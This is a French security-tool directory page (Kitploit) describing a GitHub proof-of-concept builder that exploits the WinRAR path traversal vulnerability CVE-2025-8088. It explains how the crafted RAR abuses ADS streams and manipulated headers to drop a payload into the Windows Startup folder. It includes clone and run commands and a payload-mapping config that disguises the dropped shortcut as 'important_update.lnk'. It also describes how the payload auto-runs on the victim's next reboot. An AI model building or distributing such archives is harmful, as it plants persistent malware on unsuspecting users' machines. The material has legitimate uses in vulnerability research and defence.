Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-8088-WinRAR-builder — Un exploit POC pour la vulnérabilité WinRAR (CVE-2025-8088) affectant les versions 7.12 et inférieures | Kitploit
Outils/GitHubGitHub/papcaii2004/cve-2025-8088-winrar-builder
Analyse des VulnérabilitésExploitationExploitation d'Applications WebAnalyse de MalwareDéveloppement de Charges Utiles
GitHubpapcaii2004/cve-2025-8088-winrar-builder

CVE-2025-8088-WinRAR-builder

Un exploit POC pour la vulnérabilité WinRAR (CVE-2025-8088) affectant les versions 7.12 et inférieures

Voir le dépôt
1il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-8088-WinRAR-builder

Un POC d'exploitation pour la vulnérabilité WinRAR (CVE-2025-8088) affectant les versions 7.12 et inférieures

🚀 Comment ça fonctionne

  1. Crée une archive RAR intégrant d'autres payloads
  2. Utilise plusieurs flux ADS 🔄 - Attache des flux de payload avec différentes profondeurs de traversée de chemin
  3. Manipule les en-têtes RAR ⚙️ - Modifie la structure de l'archive pour exploiter la vulnérabilité de traversée de chemin
  4. Dépose le payload au démarrage 📂 - Tente d'écrire le payload dans le dossier de démarrage Windows lors de l'extraction

🛠️ Utilisation

  1. Clonez le dépôt
root@kitploit:~
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
  1. Préparez les payloads
root@kitploit:~
mkdir payloads
  • Ajoutez vos payloads dans ce dossier (exe, dll, lnk, ...)
  • Modifiez PAYLOAD_MAPPING dans le script
root@kitploit:~
# 2. Mappez votre payload vers la destination correspondante
#   Format : (nom_fichier_dans_dossier_payloads, destination_extraction_cible)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # Payload 1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # Payload 2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # Payload 3
    # Ajoutez le vôtre    
]
  1. Exécutez l'exploit
root@kitploit:~
python builder.py <fichier_leurre>

🔄 Flux d'exécution

  1. La victime extrait le RAR avec WinRAR vulnérable (≤7.12)
  2. Le payload est écrit dans le dossier de destination, par exemple :
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. Au prochain redémarrage ➡️ le payload s'exécute automatiquement

📋 Prérequis

  • Système d'exploitation Windows 🪟
  • Python 3.x 🐍
  • WinRAR installé
Télécharger l’outil